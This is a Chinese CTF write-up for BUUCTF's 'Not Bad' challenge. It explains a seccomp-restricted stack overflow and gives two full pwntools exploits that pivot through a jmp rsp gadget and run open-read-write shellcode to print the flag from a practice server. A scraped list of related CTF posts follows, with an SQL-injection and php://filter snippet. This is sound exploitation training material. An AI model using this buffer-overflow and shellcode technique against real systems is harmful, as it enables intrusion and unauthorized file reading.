总的来说这是一个64位orw的题

开头先在主函数里分配了一个很大的空间

1 __int64 __fastcall main(int a1, char **a2, char **a3)

2 {

3   mmap((void *)0x123000, 0x1000uLL, 6, 34, -1, 0LL);

4   sub_400949();

5   sub_400906();

6   sub_400A16();

7   return 0LL;

8 }
 1 __int64 sub_400949()

 2 {

 3   __int64 v1; // [rsp+8h] [rbp-8h]

 4

 5   v1 = seccomp_init(0LL);

 6   seccomp_rule_add(v1, 2147418112LL, 0LL, 0LL);

 7   seccomp_rule_add(v1, 2147418112LL, 1LL, 0LL);

 8   seccomp_rule_add(v1, 2147418112LL, 2LL, 0LL);

 9   seccomp_rule_add(v1, 2147418112LL, 60LL, 0LL);

10   return seccomp_load(v1);

11 }

这里开了沙盒看一下只给了open,read,write,exit很明显是一个orw的题

漏洞函数:

1 int sub_400A16()

2 {

3   char buf[32]; // [rsp+0h] [rbp-20h] BYREF

4

5   puts("Easy shellcode, have fun!");

6   read(0, buf, 0x38uLL);

7   return puts("Baddd! Focu5 me! Baddd! Baddd!");

8 }

溢出字节较少可以考虑用栈迁移,但是看了其他师傅的wp后发现了一种新的解题方法,即利用 jmp rsp这条指令。我们把这条指令的地址放到返回地址上,接下来就可以利用汇编来控制 rsp的位置了。

大多数师傅都是用 shellcraft 来自动化构造的,但是我认为有手搓 shellcode 的能力也很重要。

附上用 shellcraft 构造的exp:

from pwn import *

context.arch='amd64'

context.log_level='debug'

s=remote('node4.buuoj.cn',26979)

#s=process('./bad')

mmap=0x123000

jmp_rsp=0x400a01

orw_payload = shellcraft.open("./flag")

orw_payload += shellcraft.read(3, mmap+0x100, 0x50)

orw_payload += shellcraft.write(1, mmap+0x100,0x50)

payload=asm(shellcraft.read(0,mmap,0x100))+asm('mov rax,0x123000;call rax')

payload=payload.ljust(0x28,b'\x00')

payload+=p64(jmp_rsp)+asm('sub rsp,0x30;jmp rsp')

s.sendline(payload)

s.send(asm(orw_payload))

s.interactive()

手搓 shellcode 的exp:

 1 from pwn import *

 2 context.arch='amd64'

 3 context.log_level='debug'

 4

 5 s=remote('node4.buuoj.cn',26979)

 6 #s=process('./bad')

 7

 8 jmp_rsp=0x400a01

 9 shellcode1='''

10     xor rdi, rdi

11     mov rsi, 0x123000

12     mov rdx, 0x100

13     mov rax, 0

14     syscall

15     mov rax, 0x123000

16     call rax

17 '''

18

19 shellcode2='''

20     mov rdi, 0x67616c662f2e  //这个是.\flag由于小端序存储的倒着写的 gafl\.的16进制表示。

21     push rdi

22     mov rdi, rsp

23     mov rsi, 0

24     mov rdx, 0

25     mov rax, 2

26     syscall

27     mov rdi, 3

28     mov rsi, rsp

29     mov rdx, 0x100

30     mov rax, 0

31     syscall

32     mov rdi, 1

33     mov rsi, rsp

34     mov edx, 0x100

35     mov rax, 1

36     syscall

37 '''

38 payload=asm(shellcode1)

39 payload=payload.ljust(0x28,b'\x00')

40 payload+=p64(jmp_rsp)+asm('sub rsp,0x30;jmp rsp')

41 s.sendline(payload)

42

43 s.send(asm(shellcode2))

44

45 s.interactive()

BUUCTF [极客大挑战 2019]Not Bad的更多相关文章

  1. BUUOJ [极客大挑战 2019]Secret File

    [极客大挑战 2019]Secret File 0X01考点 php的file伪协议读取文件 ?file=php://filter/convert.base64-encode/resource= 0X ...

  2. [原题复现][极客大挑战 2019]BuyFlag

    简介  原题复现:[极客大挑战 2019]BuyFlag  考察知识点:php函数特性(is_numeric().strcmp函数())  线上平台:https://buuoj.cn(北京联合大学公开 ...

  3. BUUCTF-[极客大挑战 2019]BabySQL(联合注入绕过waf)+[极客大挑战 2019]LoveSQL(联合注入)

    BUUCTF-[极客大挑战 2019]BabySQL(联合注入绕过waf) 记一道联合注入的题,这道题存在过滤. 经过手工的测试,网站会检验用户名和密码是否都存在,如果在用户名处插入注入语句,语句后面 ...

  4. 极客大挑战2019 http

    极客大挑战 http referer 请求头 xff 1.查看源码,发现secret.php 2.提示要把来源改成Sycsecret.buuoj.cn,抓包,添加Referer Referer:htt ...

  5. BUUCTF(八)[极客大挑战 2019]LoveSQL

    BUUCTF 1.打开题目 注入方法可参考NewsCenter 2.测试注入点 username: 1'or'1=1 password: 1'or'1=1 登录成功,说明存在注入漏洞. 下面测试位点个 ...

  6. BUUCTF(十一)[极客大挑战 2019]Knife

    BUUCTF系列 想着应该不会这么简单吧... 结果就是这么简单ee 疯狂暗示... url:xxx/index.php 密码:Syc 连接成功... cd / ls cat flag

  7. [BUUOJ记录] [极客大挑战 2019]RCE ME

    前面考察取反或者异或绕过,后面读Flag那里我用脏方法过了,没看出来考察啥 进入题目给出源码: <?php error_reporting(0); if(isset($_GET['code']) ...

  8. [极客大挑战 2019]FinalSQL

    0x00 知识点 盲注 0x01 解题 根据题目提示盲注,随便点几下找到注入点 发现我们输入^符号成功跳转页面,证明存在注入 1^(ord(substr((select(group_concat(sc ...

  9. 极客大挑战 2019 web 部分解

    复现环境:buuoj 0x01:Havefun F12查看源码,明显html注释里是一段php get方式传参数,payload:http://f5cdd431-df98-487f-9400-e8d0 ...

随机推荐

  1. ComponentScan注解的使用

    在项目初始化时,会将加@component,@service...相关注解的类添加到spring容器中. 但是项目需要,项目初始化时自动过滤某包下面的类,不将其添加到容器中. 有两种实现方案, 1.如 ...

  2. python web框架学习笔记

    一.web框架本质 1.基于socket,自己处理请求 #!/usr/bin/env python3 #coding:utf8 import socket def handle_request(cli ...

  3. CentOs 7 yum 安装Nginx

    打开官网下载文档:http://nginx.org/en/download.html 2进入操作系统 centOs 7,建立文件夹 nginx ,进入nginx ,拷贝 上图1编辑命令:/etc/yu ...

  4. python数据预处理和特性选择后列的映射

    我们在用python进行机器学习建模时,首先需要对数据进行预处理然后进行特征工程,在这些过程中,数据的格式可能会发生变化,前几天我遇到过的问题就是: 对数据进行标准化.归一化.方差过滤的时候数据都从D ...

  5. 微服务下前后端分离的统一认证授权服务,基于Spring Security OAuth2 + Spring Cloud Gateway实现单点登录

    1.  整体架构 在这种结构中,网关就是一个资源服务器,它负责统一授权(鉴权).路由转发.保护下游微服务. 后端微服务应用完全不用考虑权限问题,也不需要引入spring security依赖,就正常的 ...

  6. numpy基础教程--where函数的使用

    在numpy中,where函数是一个三元运算符,函数原型为where(condition, x, y),意思是当条件成立的时候,将矩阵的值设置为x,否则设置为y 一个很简单的应用就是,在一个矩阵当中, ...

  7. Jenkins分布式与并行

    目录 一.简介 二.agent 通过JNLP协议增加agent 通过Swarm插件增加agent agent部分详解 三.agent放入Docker 使用Docker 配置Docker私有仓库 四.并 ...

  8. AD小白如何发板厂制板--导出gerber文件和钻孔文件+嘉立创下单教程

    AD如何发工程制板子? 方式1,发PCB源文件给板厂 方式2,发一些工艺文件给板厂,这样就无须泄漏你的PCB源文件了,一个硬件工程师必须要掌握方式2. 方式2要做的就是导出gerber文件和钻孔文件, ...

  9. [BUUCTF]REVERSE——[FlareOn4]login

    [FlareOn4]login 附件 步骤: 是个网页,直接打开,查看网页源码 百度了几个函数 charCodeAt(0)是返回当前字符的Unicode 编码 String.fromCharCode返 ...

  10. 工时资源(Project)

    <Project2016 企业项目管理实践>张会斌 董方好 编著 资源既然各种导入都会发生些不可描述的事,那就手工建立吧.但是问题又来了,资源还分种类的:工时资源.材料资源和成本资源. 好 ...